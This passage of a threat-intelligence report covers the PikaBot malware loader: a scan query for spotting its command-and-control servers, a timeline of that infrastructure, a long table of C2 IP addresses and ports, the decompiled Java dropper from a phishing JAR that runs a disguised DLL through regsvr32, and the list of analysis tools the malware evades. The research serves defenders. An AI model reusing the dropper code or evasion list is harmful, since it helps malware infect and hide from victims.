“Server”:\r\nservices:(tls.certificates.leaf_data.issuer.province=/[A-Z]{2}/ and tls.certificates.leaf_data.issuer.country=/[A-Z]\r\n{2}/ and tls.certificates.leaf_data.issuer.organization=/[A-Z][a-z]{4,24}( [A-Z][a-z]{4,24})?( Inc.)?/ and\r\ntls.certificates.leaf_data.issuer.common_name=/[a-z]{6,32}\\.[a-z]{2,8}/ and\r\njarm.fingerprint=”21d19d00021d21d21c21d19d21d21dd188f9fdeea4d1b361be3a6ec494b2d2″ and\r\nservices.http.response.headers: (key:”Server” and value.headers=”nginx”))\r\nTo ensure comprehensive coverage of the entire PikaBot C2 infrastructure, we cannot rely solely on proactive\r\nheuristics because the internet scan engines do not consistently scan unusual ports, like those used by PikaBot C2\r\nservers. At that time of writing, the malware used high ports for its C2 servers, e.g. 13720, 13721, 13724, 13782\r\nand 13786.\r\nSimilar to many other malware families, we also collect the C2 servers by extracting the malware configuration.\r\nFor PikaBot, this method is complementary to improve our coverage of the C2 infrastructure.\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 18 of 38\n\nEvolution over the year\r\nSekoia TDR monitoring of the PikaBot infrastructure since it first emerged resulted in the collection of more than\r\n360 unique IP addresses used as C2 servers between February 2023 and early May 2024.\r\nOur tracking methods primarily rely on internet scan engines and the extraction of PikaBot configurations from\r\ncollected samples. While the results presented in this report may not be comprehensive, we assess with high\r\nconfidence that our coverage is representative of the PikaBot C2 infrastructure for the following reasons:\r\nOur monitoring aligns with the intelligence shared in open-source reporting, including reports by various\r\ncybersecurity vendors and researchers.\r\nThe appearance of new C2 servers over the time coincides with the large PikaBot distribution campaigns,\r\nboth observed by Sekoia and reported in open-source.\r\nFigure 15. Number of new PikaBot C2 servers detected by Sekoia.io per week (as of early May\r\n2024)\r\nRight after its emergence, no new PikaBot C2 servers were observed in the next  months. We believe that PikaBot\r\nactivities may have been slowed down limited or completely stopped in March and April 2023. TDR analysts\r\nassess that PikaBot was still in development at that time, and the first distribution campaign operated by TA577 in\r\nFebruary 2023 served to test the malware. \r\nIn May 2023, PikaBot resurfaced, widely spread in (and limited to) several TA557 email phishing campaigns. The\r\nmalware was likely operational for the IAB group’s activities, possibly being updated for improved\r\nfunctionalities. \r\nDuring the summer of 2023, there was no new activity publicly attributed to TA557. Meanwhile, the PikaBot\r\ninfrastructure remained almost unchanged with only two new C2 servers detected by Sekoia.io in June and July,\r\nand none in August.\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 19 of 38\n\nAfter the summer holidays and the Qakbot takedown by an international law enforcement operation in August\r\n2023, PikaBot returned and was distributed in a new wave of fairly continuous campaigns between late September\r\nand the end of December. During this period, Sekoia detected an average of 20 new PikaBot C2 servers going\r\nonline each week.\r\nNotably, we observed a significant increase of new C2 between 18 and 23 December 2023, with more than 50 new\r\nservers deployed. This spike in activity occurred after a wide PikaBot distribution campaign in mid-December\r\nleveraging the malvertising technique. At the time of writing, we could not confirm whether these two events are\r\ncorrelated. However we can assume that the adoption of malvertising to propagate PikaBot resulted in a growing\r\nnumber of infected machines, which plausibly led the operator(s) to scale up the C2 infrastructure. \r\nThe distribution of PikaBot and the deployment of new infrastructure ceased in early January 2024, TDR analysts\r\nbelieve this break in PikaBot’s activities is related to holidays of Russian-speaking Orthodox countries and the\r\ncelebration of the Orthodox Christmas (7 January). The malware resurfaced a few weeks later with several TA557\r\nemail phishing campaigns again. Distribution activities and the deployment of new C2 servers then progressively\r\ndeclined until April 2024.\r\nMonitoring PikaBot’s C2 infrastructure provides additional context on malware-related activities, including\r\nlarge distribution campaigns, possible vacation breaks, and development stages. Based on the infrastructure\r\ntracking and open-source reporting, Sekoia analysts assess with high confidence that TA577 is the primary, and\r\npossibly exclusive, user of the PikaBot malware, as their distribution campaigns align with the evolution of\r\nthe PikaBot’s C2 infrastructure.\r\nConclusion\r\nPikaBot is a sophisticated malware loader used by Initial Access Brokers since February 2023. Attackers\r\nemployed various techniques to distribute PikaBot, including phishing emails, malvertising, and multiple infection\r\nchains. Adoption of specific distribution techniques likely impacted the scale of respective PikaBot campaigns, as\r\nwas possibly the case in December 2023, when a spike in PikaBot infrastructure related activity was possibly\r\ntriggered by the use of malvertising as a delivery technique.\r\nOpen-source reports indicate that successful PikaBot compromises often lead to the deployment of Black Basta\r\nransomware. PikaBot loader represents a significant threat to organisations, which must prevent, detect and\r\nrespond quickly to mitigate its possible impact.\r\nSubstantial effort appears to be directed towards the continuous development of PikaBot. Maintaining a multi-stage malware that employs numerous techniques to conceal itself, prevent its execution under specific\r\nconditions (anti-debugging, anti-analysis), and obfuscate its code and communication using evolving algorithms\r\nover time, typically requires a high level of expertise in malware development.\r\nThe apparent advancement of the team developing PikaBot developer(s), along with regular malware updates\r\nsuggests that the threat is continuously evolving to evade detection by security operators and vendors. Therefore,\r\nit is of major concern to ensure accurate surveillance of the malware evolution, to prevent and detect it in time.\r\nSekoia.io analysts routinely monitor both emerging and established botnets, maintaining close vigilance of the\r\nPikaBot threat.\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 20 of 38\n\nThank you for reading this blog post. Please don’t hesitate to provide your feedback on our publications by\r\nclicking here. You can also contact us at tdr[at]sekoia.io for further discussions.\r\nIoCs\r\nThe list of IoCs is available on Sekoia.io GitHub repository.\r\nIP address Port Valid from Valid until\r\n172.234.250.178 2222 2024-05-06 2024-06-05\r\n20.67.206.46 443 2024-04-24 2024-05-24\r\n172.233.155.253 2078 2024-04-05 2024-04-22\r\n172.233.221.61 5938 2024-04-04 2024-05-10\r\n213.199.41.33 13721 2024-03-26 2024-05-16\r\n194.233.91.144 5000 2024-03-26 2024-05-16\r\n158.220.95.214 5243 2024-03-26 2024-05-08\r\n84.247.157.112 13783 2024-03-26 2024-05-16\r\n172.232.208.90 2223 2024-03-26 2024-05-05\r\n158.220.95.215 5242 2024-03-26 2024-05-03\r\n64.23.199.206 1194 2024-03-26 2024-05-03\r\n4.175.178.149 443 2024-03-23 2024-04-22\r\n70.34.199.64 9785 2024-03-06 2024-04-05\r\n45.77.63.237 5632 2024-03-06 2024-04-05\r\n94.72.104.77 13724 2024-03-06 2024-04-05\r\n154.53.55.165 13783 2024-03-06 2024-04-05\r\n198.38.94.213 2224 2024-03-06 2024-04-05\r\n154.12.236.248 13786 2024-03-06 2024-04-05\r\n94.72.104.80 5000 2024-03-06 2024-04-05\r\n209.126.86.48 1194 2024-03-06 2024-04-05\r\n158.247.240.58 5632 2024-03-06 2024-04-05\r\n70.34.223.164 5000 2024-03-06 2024-04-05\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 21 of 38\n\n84.46.240.42 2083 2024-03-05 2024-04-04\r\n65.20.73.169 13783 2024-03-01 2024-03-31\r\n65.20.69.208 5000 2024-03-01 2024-03-31\r\n23.226.138.143 2083 2024-02-29 2024-03-30\r\n192.248.159.76 2222 2024-02-29 2024-03-30\r\n54.84.110.180 443 2024-02-21 2024-03-22\r\n45.32.204.175 2222 2024-02-20 2024-03-21\r\n45.77.55.133 2078 2024-02-20 2024-03-21\r\n154.38.175.241 13721 2024-02-19 2024-03-23\r\n154.12.248.41 5000 2024-02-19 2024-03-23\r\n154.12.233.66 2224 2024-02-19 2024-03-30\r\n148.113.141.220 2224 2024-02-19 2024-03-23\r\n89.117.23.186 5632 2024-02-19 2024-03-30\r\n57.128.165.176 13721 2024-02-19 2024-03-30\r\n145.239.135.24 5243 2024-02-19 2024-03-30\r\n109.199.99.131 13721 2024-02-19 2024-03-23\r\n141.95.106.106 2967 2024-02-19 2024-03-23\r\n89.117.23.34 5938 2024-02-19 2024-03-23\r\n89.117.23.185 2221 2024-02-19 2024-03-30\r\n172.232.190.57 2224 2024-02-17 2024-03-23\r\n185.179.217.216 9785 2024-02-16 2024-03-23\r\n172.232.174.6 5242 2024-02-16 2024-03-23\r\n172.232.186.100 2083 2024-02-15 2024-03-23\r\n86.38.225.109 13724 2024-02-14 2024-03-21\r\n131.153.231.178 2221 2024-02-14 2024-03-20\r\n45.32.21.184 5242 2024-02-14 2024-03-20\r\n104.156.233.235 2226 2024-02-14 2024-03-21\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 22 of 38\n\n95.179.135.3 2225 2024-02-14 2024-03-20\r\n198.44.187.12 2224 2024-02-14 2024-03-23\r\n155.138.147.62 2223 2024-02-14 2024-03-20\r\n154.201.81.8 2967 2024-02-14 2024-03-15\r\n108.61.78.17 13783 2024-02-14 2024-03-20\r\n172.232.189.219 2224 2024-02-14 2024-03-23\r\n172.232.162.97 13783 2024-02-14 2024-03-23\r\n172.232.189.10 1194 2024-02-14 2024-03-23\r\n43.229.78.74 2226 2024-02-14 2024-03-15\r\n104.129.55.106 13783 2024-02-13 2024-03-30\r\n45.76.251.190 5631 2024-02-13 2024-03-21\r\n103.82.243.5 13785 2024-02-13 2024-03-30\r\n104.129.55.105 2223 2024-02-13 2024-03-30\r\n45.32.248.100 2226 2024-02-13 2024-03-21\r\n86.38.225.105 13721 2024-02-12 2024-03-30\r\n86.38.225.106 2221 2024-02-12 2024-03-30\r\n86.38.225.108 2226 2024-02-12 2024-03-19\r\n37.60.242.86 2967 2024-02-09 2024-03-23\r\n178.18.246.136 2078 2024-02-09 2024-03-30\r\n23.226.138.161 5242 2024-02-09 2024-03-23\r\n85.239.243.155 5000 2024-02-08 2024-03-30\r\n139.84.237.229 2967 2024-02-08 2024-03-15\r\n95.179.191.137 5938 2024-02-08 2024-03-15\r\n158.220.80.157 9785 2024-02-08 2024-03-15\r\n158.220.80.167 2967 2024-02-08 2024-03-15\r\n65.20.66.218 5938 2024-02-08 2024-03-15\r\n37.60.242.85 9785 2024-02-08 2024-03-30\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 23 of 38\n\n104.129.55.103 2224 2024-02-08 2024-03-15\r\n104.129.55.104 2223 2024-02-08 2024-03-15\r\n78.47.233.121 443 2024-01-24 2024-02-23\r\n109.123.227.104 2221 2024-01-23 2024-03-17\r\n139.180.185.171 2222 2024-01-23 2024-03-17\r\n192.248.174.52 5631 2024-01-23 2024-03-17\r\n154.38.184.3 2223 2024-01-23 2024-03-17\r\n85.239.243.3 23399 2023-12-23 2024-01-29\r\n109.123.227.158 2223 2023-12-21 2024-01-29\r\n109.123.227.174 23399 2023-12-21 2024-01-29\r\n85.239.237.153 5632 2023-12-21 2024-01-28\r\n172.234.224.202 13785 2023-12-21 2024-01-20\r\n5.180.151.180 2224 2023-12-21 2024-01-29\r\n5.180.151.194 5631 2023-12-21 2024-01-29\r\n109.123.227.167 5938 2023-12-21 2024-01-29\r\n172.232.172.228 2221 2023-12-21 2024-01-20\r\n172.232.189.141 2078 2023-12-21 2024-01-20\r\n109.123.227.170 5632 2023-12-21 2024-01-29\r\n172.232.172.171 13721 2023-12-21 2024-01-20\r\n154.38.164.50 5243 2023-12-21 2024-01-28\r\n109.123.227.147 5243 2023-12-21 2024-01-29\r\n109.123.227.166 5938 2023-12-21 2024-01-29\r\n172.232.7.224 9785 2023-12-21 2024-01-20\r\n185.187.235.158 23399 2023-12-20 2024-01-29\r\n172.232.189.134 2221 2023-12-20 2024-01-27\r\n65.20.78.70 2967 2023-12-20 2024-01-19\r\n139.180.137.30 5000 2023-12-20 2024-01-19\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 24 of 38\n\n172.232.161.248 13783 2023-12-20 2024-01-19\r\n107.191.56.230 13783 2023-12-20 2024-01-19\r\n89.117.55.179 2083 2023-12-20 2024-01-28\r\n216.128.179.120 2967 2023-12-20 2024-01-19\r\n216.128.151.26 13782 2023-12-20 2024-01-27\r\n172.232.162.62 2083 2023-12-20 2024-01-19\r\n46.250.253.58 5243 2023-12-20 2024-01-27\r\n178.154.205.14 443 2023-12-20 2024-01-19\r\n149.28.252.250 5000 2023-12-20 2024-01-27\r\n172.232.172.117 1194 2023-12-20 2024-01-19\r\n89.117.55.178 2083 2023-12-20 2024-01-28\r\n104.207.143.168 2222 2023-12-20 2024-01-27\r\n154.38.185.135 13782 2023-12-20 2024-01-27\r\n95.179.247.197 13782 2023-12-20 2024-01-19\r\n64.176.67.92 2078 2023-12-20 2024-01-19\r\n172.232.189.146 2078 2023-12-20 2024-01-19\r\n172.232.190.249 5631 2023-12-20 2024-01-19\r\n154.38.185.138 13786 2023-12-20 2024-01-28\r\n45.76.119.22 13724 2023-12-19 2024-01-18\r\n69.164.213.141 5631 2023-12-19 2024-01-18\r\n78.141.223.212 1194 2023-12-19 2024-01-25\r\n45.76.96.172 2223 2023-12-18 2024-01-25\r\n64.176.13.28 2083 2023-12-18 2024-01-25\r\n45.76.22.139 13786 2023-12-18 2024-01-25\r\n51.161.81.190 13721 2023-12-18 2024-02-29\r\n45.56.71.218 13724 2023-12-18 2024-01-26\r\n216.238.79.12 2221 2023-12-18 2024-01-25\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 25 of 38\n\n78.141.200.111 5938 2023-12-18 2024-01-25\r\n65.20.85.39 2967 2023-12-18 2024-01-25\r\n149.28.100.66 5243 2023-12-18 2024-01-25\r\n172.232.54.192 2224 2023-12-18 2024-01-26\r\n208.76.221.253 13724 2023-12-18 2024-01-25\r\n70.34.196.219 2226 2023-12-18 2024-01-25\r\n172.232.188.4 2226 2023-12-18 2024-01-26\r\n155.138.140.156 13720 2023-12-18 2024-01-25\r\n45.33.15.215 2967 2023-12-18 2024-01-26\r\n172.232.189.166 1194 2023-12-18 2024-01-26\r\n149.28.189.244 2222 2023-12-17 2024-01-23\r\n66.135.31.146 2078 2023-12-16 2024-01-15\r\n172.232.163.182 2222 2023-12-16 2024-01-23\r\n65.20.115.154 5243 2023-12-15 2024-01-22\r\n54.37.79.82 2223 2023-12-15 2024-01-21\r\n167.179.93.21 1194 2023-12-15 2024-01-22\r\n57.128.103.99 2078 2023-12-15 2024-01-21\r\n172.232.170.25 13724 2023-12-15 2024-01-23\r\n172.232.173.219 5938 2023-12-14 2024-01-22\r\n172.232.186.251 5632 2023-12-14 2024-01-23\r\n172.232.162.198 13721 2023-12-14 2024-01-23\r\n31.210.51.93 443 2023-12-14 2024-01-13\r\n149.28.17.176 1194 2023-12-13 2024-01-19\r\n172.232.163.208 2224 2023-12-13 2024-01-20\r\n172.232.164.77 5000 2023-12-13 2024-01-20\r\n64.176.66.137 5000 2023-12-13 2024-01-19\r\n64.176.68.223 13785 2023-12-13 2024-01-19\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 26 of 38\n\n107.191.47.85 5243 2023-12-13 2024-01-19\r\n172.232.163.111 5938 2023-12-13 2024-01-20\r\n172.232.175.59 5938 2023-12-13 2024-01-20\r\n172.232.164.159 5632 2023-12-13 2024-01-20\r\n95.179.212.178 13782 2023-12-13 2024-01-19\r\n45.32.253.21 2083 2023-12-13 2024-01-19\r\n192.248.183.93 5632 2023-12-13 2024-01-19\r\n199.247.8.136 13786 2023-12-13 2024-01-19\r\n141.95.108.72 443 2023-12-12 2024-01-11\r\n155.138.203.158 1194 2023-12-11 2024-03-17\r\n65.20.98.24 13783 2023-12-11 2024-03-17\r\n65.20.82.254 5243 2023-12-11 2024-03-17\r\n109.123.227.54 13785 2023-12-11 2024-01-18\r\n154.38.184.5 9785 2023-12-11 2024-01-18\r\n66.42.80.169 5631 2023-12-11 2024-01-18\r\n109.123.227.50 13782 2023-12-11 2024-01-18\r\n158.220.90.199 2083 2023-12-09 2024-01-18\r\n45.137.192.63 23399 2023-12-08 2024-01-17\r\n31.220.96.162 2224 2023-12-08 2024-01-18\r\n161.97.98.95 2083 2023-12-08 2024-01-17\r\n158.220.103.150 5632 2023-12-08 2024-01-17\r\n45.32.188.56 2967 2023-12-07 2024-01-06\r\n192.248.151.140 23399 2023-12-07 2024-01-06\r\n64.176.225.21 2225 2023-12-07 2024-01-14\r\n45.137.192.84 2223 2023-12-07 2024-01-17\r\n45.32.235.46 5242 2023-12-07 2024-01-06\r\n70.34.207.219 5000 2023-12-07 2024-01-06\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 27 of 38\n\n139.84.235.8 2225 2023-12-07 2024-01-06\r\n64.176.218.254 9785 2023-12-07 2024-01-14\r\n46.250.241.191 13721 2023-12-07 2024-01-15\r\n216.128.136.231 13786 2023-12-07 2024-01-06\r\n108.61.224.209 2967 2023-12-07 2024-01-06\r\n46.250.241.197 5000 2023-12-07 2024-01-15\r\n65.20.74.26 2221 2023-12-07 2024-01-14\r\n158.220.90.198 2083 2023-12-07 2024-01-18\r\n65.20.77.81 5242 2023-12-06 2024-01-05\r\n207.148.103.233 2967 2023-12-06 2024-01-05\r\n199.247.15.68 5938 2023-12-06 2024-01-13\r\n78.141.222.198 13786 2023-12-06 2024-01-05\r\n45.63.26.148 2224 2023-12-06 2024-01-05\r\n57.128.83.129 2078 2023-12-01 2024-01-21\r\n45.76.98.136 2221 2023-12-01 2024-01-22\r\n154.211.12.126 2967 2023-12-01 2024-02-05\r\n141.95.108.252 2078 2023-12-01 2024-01-21\r\n57.128.109.221 13724 2023-12-01 2024-01-21\r\n57.128.164.11 5242 2023-12-01 2024-01-21\r\n139.99.222.29 5631 2023-12-01 2024-01-14\r\n57.128.108.132 13785 2023-12-01 2024-01-21\r\n172.232.173.141 2226 2023-12-01 2024-01-23\r\n51.83.253.102 9785 2023-12-01 2024-01-21\r\n46.250.241.188 1194 2023-11-18 2023-12-25\r\n207.148.93.23 2221 2023-11-17 2023-12-24\r\n64.176.190.166 2222 2023-11-17 2023-12-24\r\n45.32.244.94 9785 2023-11-17 2023-12-24\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 28 of 38\n\n155.138.132.163 13786 2023-11-15 2023-12-21\r\n158.247.196.155 9785 2023-11-15 2023-12-21\r\n45.32.232.31 13782 2023-11-15 2023-12-21\r\n45.33.69.35 5242 2023-11-15 2023-12-22\r\n172.232.189.83 5243 2023-11-15 2023-12-25\r\n97.107.131.224 13782 2023-11-15 2023-12-25\r\n172.232.189.84 23399 2023-11-15 2023-12-22\r\n70.34.223.131 5938 2023-11-13 2023-12-19\r\n139.180.168.216 13786 2023-11-13 2023-12-20\r\n95.179.182.147 2078 2023-11-13 2023-11-23\r\n167.179.100.211 2221 2023-11-13 2023-12-21\r\n95.179.214.49 5242 2023-11-13 2023-12-20\r\n70.34.242.159 5243 2023-11-13 2023-12-20\r\n154.12.255.254 23399 2023-11-09 2023-12-17\r\n65.20.77.19 5242 2023-11-09 2023-12-16\r\n158.247.215.68 2225 2023-11-09 2023-12-16\r\n95.179.206.77 13782 2023-11-09 2023-12-16\r\n217.69.14.55 13724 2023-11-09 2023-12-16\r\n149.28.49.170 23399 2023-11-09 2023-12-16\r\n158.247.246.182 2226 2023-11-07 2023-12-14\r\n158.247.197.73 23399 2023-11-06 2023-12-06\r\n104.238.144.171 2221 2023-11-06 2023-12-06\r\n136.244.98.80 13783 2023-11-06 2023-12-14\r\n198.13.58.126 2223 2023-11-06 2023-12-06\r\n45.76.103.152 13720 2023-11-06 2023-12-19\r\n65.20.84.3 2221 2023-11-06 2023-12-06\r\n149.248.53.65 2221 2023-11-06 2023-12-14\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 29 of 38\n\n65.20.84.254 13783 2023-11-06 2023-12-06\r\n207.246.111.127 13786 2023-11-06 2023-12-14\r\n158.247.202.180 13783 2023-11-06 2023-12-06\r\n95.179.141.41 1194 2023-11-04 2023-12-10\r\n167.179.103.206 2083 2023-11-03 2023-12-09\r\n45.32.140.39 2078 2023-11-03 2023-12-09\r\n45.33.85.73 13721 2023-11-01 2023-12-08\r\n172.233.154.98 13785 2023-11-01 2023-12-08\r\n172.233.185.220 5242 2023-11-01 2023-12-08\r\n104.237.145.83 2083 2023-11-01 2023-12-08\r\n50.116.54.138 13724 2023-10-31 2023-12-08\r\n51.68.144.135 2083 2023-10-31 2023-12-08\r\n140.82.56.164 5632 2023-10-31 2023-11-30\r\n139.144.97.180 2224 2023-10-31 2023-11-30\r\n104.200.28.75 2222 2023-10-30 2023-12-08\r\n202.182.121.203 2083 2023-10-30 2023-11-29\r\n65.20.82.17 5938 2023-10-30 2023-12-06\r\n158.247.210.203 2222 2023-10-30 2023-11-29\r\n172.234.16.175 2083 2023-10-30 2023-12-06\r\n185.106.94.167 5631 2023-10-28 2023-12-05\r\n45.79.174.92 1194 2023-10-28 2023-12-05\r\n139.144.31.103 1194 2023-10-28 2023-12-04\r\n216.128.176.211 2222 2023-10-27 2023-12-04\r\n172.234.29.13 2224 2023-10-24 2023-12-01\r\n198.244.141.4 9785 2023-10-24 2023-12-03\r\n172.233.187.145 2226 2023-10-24 2023-12-02\r\n139.144.215.192 13785 2023-10-24 2023-11-30\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 30 of 38\n\n172.233.186.50 5632 2023-10-24 2023-11-30\r\n45.33.76.163 2223 2023-10-24 2023-12-01\r\n45.79.147.119 9785 2023-10-24 2023-12-01\r\n172.232.188.124 2083 2023-10-24 2023-11-23\r\n217.69.8.229 13782 2023-10-24 2023-11-30\r\n139.177.198.199 2226 2023-10-24 2023-12-02\r\n172.232.24.58 2226 2023-10-24 2023-11-30\r\n176.58.102.36 2225 2023-10-24 2023-11-30\r\n15.235.143.190 2224 2023-10-23 2023-12-06\r\n85.215.218.128 5243 2023-10-23 2023-11-29\r\n103.231.93.15 5631 2023-10-23 2023-12-03\r\n155.138.156.94 5243 2023-10-23 2023-11-29\r\n154.12.252.84 23399 2023-10-23 2023-12-18\r\n196.218.123.202 13783 2023-10-23 2024-03-23\r\n156.251.137.134 5000 2023-10-23 2023-11-29\r\n51.68.146.19 5242 2023-10-23 2023-12-06\r\n139.99.216.90 13720 2023-10-23 2023-12-06\r\n34.135.79.247 443 2023-10-21 2023-11-20\r\n109.107.182.12 443 2023-10-20 2023-11-19\r\n109.107.182.13 443 2023-10-20 2023-11-19\r\n109.107.182.17 443 2023-10-20 2023-11-19\r\n109.107.182.18 443 2023-10-20 2023-11-19\r\n109.107.182.15 443 2023-10-20 2023-11-19\r\n109.107.182.14 443 2023-10-20 2023-11-19\r\n109.107.182.16 443 2023-10-20 2023-11-19\r\n109.107.182.10 443 2023-10-19 2023-11-26\r\n109.107.182.11 443 2023-10-19 2023-11-26\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 31 of 38\n\n109.107.182.19 443 2023-10-19 2023-11-18\r\n91.215.85.216 443 2023-10-18 2023-11-25\r\n91.215.85.154 443 2023-10-18 2023-11-25\r\n91.215.85.197 443 2023-10-18 2023-11-26\r\n85.106.94.167 5631 2023-10-17 2023-11-16\r\n185.106.94.177 13721 2023-10-17 2023-11-23\r\n185.106.94.152 13720 2023-10-17 2023-11-23\r\n80.85.140.43 9785 2023-10-17 2023-11-24\r\n80.85.140.152 5938 2023-10-11 2023-11-24\r\n78.128.112.208 443 2023-10-11 2023-11-24\r\n88.214.27.74 443 2023-10-11 2023-11-23\r\n185.106.94.174 5000 2023-10-11 2023-11-23\r\n45.182.189.105 443 2023-10-11 2023-11-23\r\n94.16.122.250 2078 2023-10-09 2023-10-19\r\n94.228.169.221 2083 2023-10-09 2023-10-19\r\n45.131.108.250 1194 2023-10-04 2023-11-03\r\n144.64.204.81 2078 2023-10-04 2023-11-03\r\n102.129.139.65 32999 2023-10-04 2023-11-12\r\n79.141.175.96 2078 2023-10-03 2023-11-02\r\n209.126.9.47 2078 2023-10-03 2023-11-02\r\n167.86.96.3 2222 2023-10-03 2023-11-02\r\n38.242.240.28 1194 2023-10-03 2023-11-13\r\n192.254.69.35 2078 2023-10-02 2023-10-12\r\n104.243.45.170 2222 2023-10-02 2023-10-12\r\n154.92.19.139 2222 2023-10-01 2024-01-14\r\n15.235.47.206 13783 2023-10-01 2023-12-08\r\n15.235.202.109 2226 2023-10-01 2023-12-08\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 32 of 38\n\n137.220.55.190 2223 2023-10-01 2023-12-27\r\n65.20.78.68 13721 2023-10-01 2023-12-21\r\n70.34.209.101 13720 2023-10-01 2023-12-27\r\n158.247.253.155 2225 2023-10-01 2023-12-27\r\n15.235.45.155 2221 2023-10-01 2023-12-08\r\n15.235.47.80 23399 2023-10-01 2023-12-08\r\n64.176.67.194 2967 2023-10-01 2023-10-31\r\n51.68.147.114 2083 2023-10-01 2023-12-08\r\n154.221.30.136 13724 2023-10-01 2024-03-17\r\n64.176.5.228 13783 2023-10-01 2023-12-21\r\n210.243.8.247 23399 2023-10-01 2024-03-17\r\n51.79.143.215 13783 2023-10-01 2023-12-08\r\n51.195.232.97 13782 2023-10-01 2023-12-16\r\n154.61.75.156 2078 2023-10-01 2024-01-20\r\n139.180.216.25 2967 2023-10-01 2023-12-27\r\n172.233.156.100 13721 2023-10-01 2023-12-28\r\n188.26.127.4 13785 2023-10-01 2023-12-09\r\n15.235.44.231 5938 2023-10-01 2023-12-08\r\n192.9.135.73 1194 2023-09-25 2024-03-23\r\n148.153.34.82 2078 2023-09-25 2023-11-29\r\n135.125.124.72 2078 2023-09-25 2023-11-06\r\n24.199.109.6 2222 2023-07-24 2023-08-10\r\n8.20.255.249 2078 2023-06-19 2023-08-24\r\n185.87.148.132 1194 2023-05-22 2023-06-21\r\n89.116.131.40 2222 2023-05-22 2023-06-21\r\n85.215.162.167 2078 2023-05-21 2023-07-06\r\n154.80.229.112 2078 2023-05-21 2023-07-06\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 33 of 38\n\n67.21.33.208 2078 2023-05-21 2023-06-20\r\n67.21.33.188 2222 2023-05-21 2023-06-20\r\n45.195.200.116 2078 2023-05-21 2023-06-20\r\n91.134.126.43 1194 2023-05-17 2023-06-16\r\n94.199.173.6 2222 2023-05-17 2023-06-16\r\n154.80.229.76 1194 2023-05-17 2023-06-16\r\n45.154.24.57 2078 2023-05-17 2023-08-30\r\n45.85.235.39 2078 2023-05-17 2023-06-30\r\n103.151.20.137 2078 2023-05-17 2023-08-03\r\n129.153.135.83 2078 2023-05-17 2023-08-18\r\n37.1.208.52 443 2023-02-01 2023-03-02\r\n45.182.189.106 443 2023-02-01 2023-02-10\r\n23.227.194.96 443 2023-02-01 2023-08-03\r\n23.227.193.224 443 2023-02-01 2023-03-02\r\n213.142.147.218 443 2023-02-01 2023-02-10\r\n185.87.151.234 443 2023-02-01 2023-03-02\r\n5.45.69.171 443 2023-02-01 2023-02-10\r\n62.197.48.230 443 2023-02-01 2023-03-02\r\n5.61.43.38 443 2023-02-01 2023-03-02\r\n185.87.150.108 443 2023-02-01 2023-02-10\r\n205.204.71.238 443 2023-02-01 2023-03-02\r\n37.1.215.220 443 2023-02-01 2023-03-09\r\nTable 2. IoCs of PikaBot C2 server\r\nAnnexes\r\nAnnex 1 – Short campaign analysis\r\nThe analysed sample in this FLint originates from a phishing campaign, the payload is delivered in an email as an\r\nattachment. The attached file is a ZIP archive (PERFERENDISF.zip) which contains a Java JAR file. The JAR file\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 34 of 38\n\ncan be deflate with 7z tool, it contains three files:\r\nFigure 16. Content of the ZIP archive delivered in the PikaBot phishing campaign\r\nThe file “hBHGHjbH.class” is the Java code used to load and execute the next stage of the attack, the gif is the\r\nicon of the JAR and the file “163520” contains the malicious next stage payload (The PikaBot stage-0 DLL).\r\nimport java.io.File;\r\nimport java.io.InputStream;\r\nimport java.nio.file.CopyOption;\r\nimport java.nio.file.Files;\r\npublic class hBHGHjbH {\r\n public static void main(String[] var0) {\r\n try {\r\n File var1 = new File(System.getProperty(\"java.io.tmpdir\") + \"\\\\163520.png\");\r\n if (!var1.exists()) {\r\n InputStream var2 = hBHGHjbH.class.getResourceAsStream(\"163520\");\r\n Files.copy(var2, var1.getAbsoluteFile().toPath(), new CopyOption[0]);\r\n }\r\n Thread.sleep(1000L);\r\n Runtime.getRuntime().exec(\"regsvr32 /s \" + System.getProperty(\"java.io.tmpdir\") + \"\\\\163520.png\");\r\n } catch (Exception var3) {\r\n System.out.println(\"Error!\");\r\n }\r\n }\r\n}\r\nThe JAVA code is straight forward, it extracts one resource from the JAR “163520” to a temporary directory and\r\nadds a fake “.png” extension before running it with regsvr32.exe.\r\nAnnex 2 – List of banned process\r\ncheatengine-x86_64-SSE4-AVX2.exe\r\nx32dbg.exe\r\nx64dbg.exe\r\nFiddler.exe\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 35 of 38\n\nhttpdebugger.exe\r\ncheatengine-i386.exe\r\ncheatengine-x86_64.exe\r\nPETools.exe\r\nLordPE.exe\r\nSysInspector.exe\r\nroc_analyzer.exe\r\nsysAnalyzer.exe\r\nsniff_hit.exe\r\nwindbg.exe\r\njoeboxcontrol.exe\r\njoboxserver.exe\r\nResourceHacker.exe\r\nImmunityDebugger.exe\r\nWireswhar.exe 